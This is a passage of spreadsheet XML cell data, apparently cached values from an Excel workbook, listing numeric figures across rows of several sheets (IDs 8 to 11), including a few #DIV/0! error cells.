          <cell r="V76">
            <v>4.10557184750733e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>1e-11</v>
          </cell>
          <cell r="R77">
            <v>1e-11</v>
          </cell>
          <cell r="S77">
            <v>5059.82000000012</v>
          </cell>
          <cell r="T77">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U77">
            <v>5.95238095238095e-12</v>
          </cell>
          <cell r="V77">
            <v>61.825757575759</v>
          </cell>
          <cell r="W77">
            <v>0</v>
          </cell>
          <cell r="X77">
            <v>0</v>
          </cell>
          <cell r="Y77">
            <v>19.77</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>7</v>
          </cell>
          <cell r="R79">
            <v>88.4491666666667</v>
          </cell>
          <cell r="S79">
            <v>3726.00805555556</v>
          </cell>
          <cell r="T79">
            <v>29.1666666666667</v>
          </cell>
          <cell r="U79">
            <v>52.6483134920635</v>
          </cell>
          <cell r="V79">
            <v>45.5279576680786</v>
          </cell>
          <cell r="W79">
            <v>90.5714285714285</v>
          </cell>
          <cell r="X79">
            <v>98.6781484656912</v>
          </cell>
          <cell r="Y79">
            <v>102.175034064234</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>23.9997222222222</v>
          </cell>
          <cell r="R80">
            <v>81.4991666666667</v>
          </cell>
          <cell r="S80">
            <v>2686.355</v>
          </cell>
          <cell r="T80">
            <v>99.9988425925926</v>
          </cell>
          <cell r="U80">
            <v>48.5114087301587</v>
          </cell>
          <cell r="V80">
            <v>32.8244745845552</v>
          </cell>
          <cell r="W80">
            <v>74.6675308741999</v>
          </cell>
          <cell r="X80">
            <v>79.7554167220524</v>
          </cell>
          <cell r="Y80">
            <v>79.1466503868625</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>8</v>
          </cell>
          <cell r="R81">
            <v>90.4658333333333</v>
          </cell>
          <cell r="S81">
            <v>2986.22916666667</v>
          </cell>
          <cell r="T81">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U81">
            <v>53.8487103174603</v>
          </cell>
          <cell r="V81">
            <v>36.4886261811665</v>
          </cell>
          <cell r="W81">
            <v>289.375</v>
          </cell>
          <cell r="X81">
            <v>284.989471163146</v>
          </cell>
          <cell r="Y81">
            <v>275.962682033501</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="8">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4894.6</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>60111.9150000504</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>4348</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4099.27</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>52948.9879999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>128.8</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>6846.6</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>1077</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>681.93</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>12582.85</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>3102</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>2175.48</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>28153.936</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>368</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>4120.30199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>508.07</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>182.05</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3498.58600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>1390.45</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>112.75</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>8e-6</v>
          </cell>
          <cell r="S72">
            <v>0.000349</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.25194931773879e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.11174785100287e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>1e-6</v>
          </cell>
          <cell r="R73">
            <v>8e-6</v>
          </cell>
          <cell r="S73">
            <v>5781.730349</v>
          </cell>
          <cell r="T73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V73">
            <v>70.4401845638402</v>
          </cell>
          <cell r="W73">
            <v>1e-5</v>
          </cell>
          <cell r="X73">
            <v>1e-5</v>
          </cell>
          <cell r="Y73">
            <v>239.299857738835</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>7e-11</v>
          </cell>
          <cell r="S76">
            <v>3.37e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>3.64583333333333e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10575048732944e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>1e-11</v>
          </cell>
          <cell r="R77">
            <v>1e-11</v>
          </cell>
          <cell r="S77">
            <v>5059.82000000012</v>
          </cell>
          <cell r="T77">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U77">
            <v>5.20833333333333e-12</v>
          </cell>
          <cell r="V77">
            <v>61.6449805068241</v>
          </cell>
          <cell r="W77">
            <v>0</v>
          </cell>
          <cell r="X77">
            <v>0</v>
          </cell>
          <cell r="Y77">
            <v>19.77</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>11.2497222222222</v>
          </cell>
          <cell r="R79">
            <v>99.6988888888889</v>
          </cell>
          <cell r="S79">
            <v>3737.25777777778</v>
          </cell>
          <cell r="T79">
            <v>46.8738425925926</v>
          </cell>
          <cell r="U79">
            <v>51.9265046296296</v>
          </cell>
          <cell r="V79">
            <v>45.5318930041152</v>
          </cell>
          <cell r="W79">
            <v>89.4244302328453</v>
          </cell>
          <cell r="X79">
            <v>97.6339867824226</v>
          </cell>
          <cell r="Y79">
            <v>102.13665278047</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>11.7497222222222</v>
          </cell>
          <cell r="R80">
            <v>93.2488888888889</v>
          </cell>
          <cell r="S80">
            <v>2698.10472222222</v>
          </cell>
          <cell r="T80">
            <v>48.9571759259259</v>
          </cell>
          <cell r="U80">
            <v>48.5671296296296</v>
          </cell>
          <cell r="V80">
            <v>32.8716462259043</v>
          </cell>
          <cell r="W80">
            <v>91.6617414123265</v>
          </cell>
          <cell r="X80">
            <v>81.255659882751</v>
          </cell>
          <cell r="Y80">
            <v>79.2011511784455</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>8</v>
          </cell>
          <cell r="R81">
            <v>98.4658333333333</v>
          </cell>
          <cell r="S81">
            <v>2994.22916666667</v>
          </cell>
          <cell r="T81">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U81">
            <v>51.2842881944444</v>
          </cell>
          <cell r="V81">
            <v>36.4794001786875</v>
          </cell>
          <cell r="W81">
            <v>283.125</v>
          </cell>
          <cell r="X81">
            <v>284.83798948874</v>
          </cell>
          <cell r="Y81">
            <v>275.981818358927</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="9">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5210.013</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>54901.9020000504</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>4803</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4832.573</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>52919.4149999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>42.05</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>6804.55</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>1430</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>667.35</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>13345.5</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>2214</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>3080.673</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>27287.263</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>376</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>3744.30199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>240.07</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>196</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3542.65600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>1469.963</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>148.95</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>9e-6</v>
          </cell>
          <cell r="S72">
            <v>0.00035</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.25170068027211e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.11428571428571e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>1e-6</v>
          </cell>
          <cell r="R73">
            <v>9e-6</v>
          </cell>
          <cell r="S73">
            <v>5781.73035</v>
          </cell>
          <cell r="T73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V73">
            <v>70.234819606414</v>
          </cell>
          <cell r="W73">
            <v>1e-5</v>
          </cell>
          <cell r="X73">
            <v>1e-5</v>
          </cell>
          <cell r="Y73">
            <v>239.299857697446</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>8e-11</v>
          </cell>
          <cell r="S76">
            <v>3.38e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>3.7037037037037e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10592808551992e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>1e-11</v>
          </cell>
          <cell r="R77">
            <v>1e-11</v>
          </cell>
          <cell r="S77">
            <v>5059.82000000012</v>
          </cell>
          <cell r="T77">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U77">
            <v>4.62962962962963e-12</v>
          </cell>
          <cell r="V77">
            <v>61.4652575315855</v>
          </cell>
          <cell r="W77">
            <v>0</v>
          </cell>
          <cell r="X77">
            <v>0</v>
          </cell>
          <cell r="Y77">
            <v>19.77</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>11.6663888888889</v>
          </cell>
          <cell r="R79">
            <v>111.365277777778</v>
          </cell>
          <cell r="S79">
            <v>3748.92416666667</v>
          </cell>
          <cell r="T79">
            <v>48.6099537037037</v>
          </cell>
          <cell r="U79">
            <v>51.5579989711934</v>
          </cell>
          <cell r="V79">
            <v>45.5408669420149</v>
          </cell>
          <cell r="W79">
            <v>99.3452225052977</v>
          </cell>
          <cell r="X79">
            <v>97.8132521856254</v>
          </cell>
          <cell r="Y79">
            <v>102.12796604537</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>15</v>
          </cell>
          <cell r="R80">
            <v>108.248888888889</v>
          </cell>
          <cell r="S80">
            <v>2713.10472222222</v>
          </cell>
          <cell r="T80">
            <v>62.5</v>
          </cell>
          <cell r="U80">
            <v>50.1152263374486</v>
          </cell>
          <cell r="V80">
            <v>32.958026266062</v>
          </cell>
          <cell r="W80">
            <v>95.3333333333333</v>
          </cell>
          <cell r="X80">
            <v>83.2063967810806</v>
          </cell>
          <cell r="Y80">
            <v>79.2903415183323</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>8</v>
          </cell>
          <cell r="R81">
            <v>106.465833333333</v>
          </cell>
          <cell r="S81">
            <v>3002.22916666667</v>
          </cell>
          <cell r="T81">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U81">
            <v>49.289737654321</v>
          </cell>
          <cell r="V81">
            <v>36.4702279721412</v>
          </cell>
          <cell r="W81">
            <v>276.75</v>
          </cell>
          <cell r="X81">
            <v>284.230246010066</v>
          </cell>
          <cell r="Y81">
            <v>275.983865322295</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="10">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1285.88</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>53616.0220000504</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>1765</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4916.57</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>49767.8449999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>36.5</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>6768.05</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>965</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>12380.5</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>2877.6</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>24409.663</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>499.5</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>3244.80199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>74</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3468.65600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>157.88</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>1e-5</v>
          </cell>
          <cell r="S72">
            <v>0.000351</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.25145348837209e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.11680911680912e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>1e-6</v>
          </cell>
          <cell r="R73">
            <v>1e-5</v>
          </cell>
          <cell r="S73">
            <v>5781.730351</v>
          </cell>
          <cell r="T73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V73">
            <v>70.0306486312984</v>
          </cell>
          <cell r="W73">
            <v>1e-5</v>
          </cell>
          <cell r="X73">
            <v>1e-5</v>
          </cell>
          <cell r="Y73">
            <v>239.299857656057</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>9e-11</v>
          </cell>
          <cell r="S76">
            <v>3.39e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>3.75e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10610465116279e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>1e-11</v>
          </cell>
          <cell r="R77">
            <v>1e-11</v>
          </cell>
          <cell r="S77">
            <v>5059.82000000012</v>
          </cell>
          <cell r="T77">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U77">
            <v>4.16666666666667e-12</v>
          </cell>
          <cell r="V77">
            <v>61.2865794573658</v>
          </cell>
          <cell r="W77">
            <v>0</v>
          </cell>
          <cell r="X77">
            <v>0</v>
          </cell>
          <cell r="Y77">
            <v>19.77</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>15.5830555555556</v>
          </cell>
          <cell r="R79">
            <v>126.948333333333</v>
          </cell>
          <cell r="S79">
            <v>3764.50722222222</v>
          </cell>
          <cell r="T79">
            <v>64.9293981481482</v>
          </cell>
          <cell r="U79">
            <v>52.8951388888889</v>
          </cell>
          <cell r="V79">
            <v>45.5972289513351</v>
          </cell>
          <cell r="W79">
            <v>113.264051052603</v>
          </cell>
          <cell r="X79">
            <v>99.7098557155798</v>
          </cell>
          <cell r="Y79">
            <v>102.174063508091</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>0</v>
          </cell>
          <cell r="R80">
            <v>108.248888888889</v>
          </cell>
          <cell r="S80">
            <v>2713.10472222222</v>
          </cell>
          <cell r="T80">
            <v>0</v>
          </cell>
          <cell r="U80">
            <v>45.1037037037037</v>
          </cell>
          <cell r="V80">
            <v>32.8622180501723</v>
          </cell>
          <cell r="W80" t="e">
            <v>#DIV/0!</v>
          </cell>
          <cell r="X80">
            <v>83.2063967810806</v>
          </cell>
          <cell r="Y80">
            <v>79.2903415183323</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>0</v>
          </cell>
          <cell r="R81">
            <v>106.465833333333</v>
          </cell>
          <cell r="S81">
            <v>3002.22916666667</v>
          </cell>
          <cell r="T81">
            <v>0</v>
          </cell>
          <cell r="U81">
            <v>44.3607638888889</v>
          </cell>
          <cell r="V81">
            <v>36.3642098675711</v>
          </cell>
          <cell r="W81" t="e">
            <v>#DIV/0!</v>
          </cell>
          <cell r="X81">
            <v>284.230246010066</v>
          </cell>
          <cell r="Y81">
            <v>275.983865322295</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="11">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3295.2</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>50320.8220000504</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>4484</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4658.25</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>49593.5949999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>161.56</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>6606.49</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>694</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>561.03</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>12513.47</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>2160</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>2777.66</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>23792.003</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>782</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>388</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>3638.80199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>149.38</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>185.2</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3432.83600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>149.6</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>1.1e-5</v>
          </cell>
          <cell r="S72">
            <v>0.000352</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.2512077294686e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.11931818181818e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>1e-6</v>
          </cell>
          <cell r="R73">
            <v>1.1e-5</v>
          </cell>
          <cell r="S73">
            <v>5781.730352</v>
          </cell>
          <cell r="T73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V73">
            <v>69.8276612560387</v>
          </cell>
          <cell r="W73">
            <v>1e-5</v>
          </cell>
          <cell r="X73">
            <v>1e-5</v>
          </cell>
          <cell r="Y73">
            <v>239.299857614668</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>1e-10</v>
          </cell>
          <cell r="S76">
            <v>3.4e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>3.78787878787879e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10628019323672e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>1e-11</v>
          </cell>
          <cell r="R77">
            <v>1e-11</v>
          </cell>
          <cell r="S77">
            <v>5059.82000000012</v>
          </cell>
          <cell r="T77">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U77">
            <v>3.78787878787879e-12</v>
          </cell>
          <cell r="V77">
            <v>61.1089371980691</v>
          </cell>
          <cell r="W77">
            <v>0</v>
          </cell>
          <cell r="X77">
            <v>0</v>
          </cell>
          <cell r="Y77">
            <v>19.77</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>16.1663888888889</v>
          </cell>
          <cell r="R79">
            <v>143.114722222222</v>
          </cell>
          <cell r="S79">
            <v>3780.67361111111</v>
          </cell>
          <cell r="T79">
            <v>67.3599537037037</v>
          </cell>
          <cell r="U79">
            <v>54.210122053872</v>
          </cell>
          <cell r="V79">
            <v>45.6603093129361</v>
          </cell>
          <cell r="W79">
            <v>100.826474681696</v>
          </cell>
          <cell r="X79">
            <v>99.8359901632917</v>
          </cell>
          <cell r="Y79">
            <v>102.168301136812</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>7.49972222222222</v>
          </cell>
          <cell r="R80">
            <v>115.748611111111</v>
          </cell>
          <cell r="S80">
            <v>2720.60444444445</v>
          </cell>
          <cell r="T80">
            <v>31.2488425925926</v>
          </cell>
          <cell r="U80">
            <v>43.8441708754209</v>
          </cell>
          <cell r="V80">
            <v>32.8575415995706</v>
          </cell>
          <cell r="W80">
            <v>92.5367606207637</v>
          </cell>
          <cell r="X80">
            <v>83.8109408560218</v>
          </cell>
          <cell r="Y80">
            <v>79.3268571036502</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>7.66638888888889</v>
          </cell>
          <cell r="R81">
            <v>114.132222222222</v>
          </cell>
          <cell r="S81">
            <v>3009.89555555556</v>
          </cell>
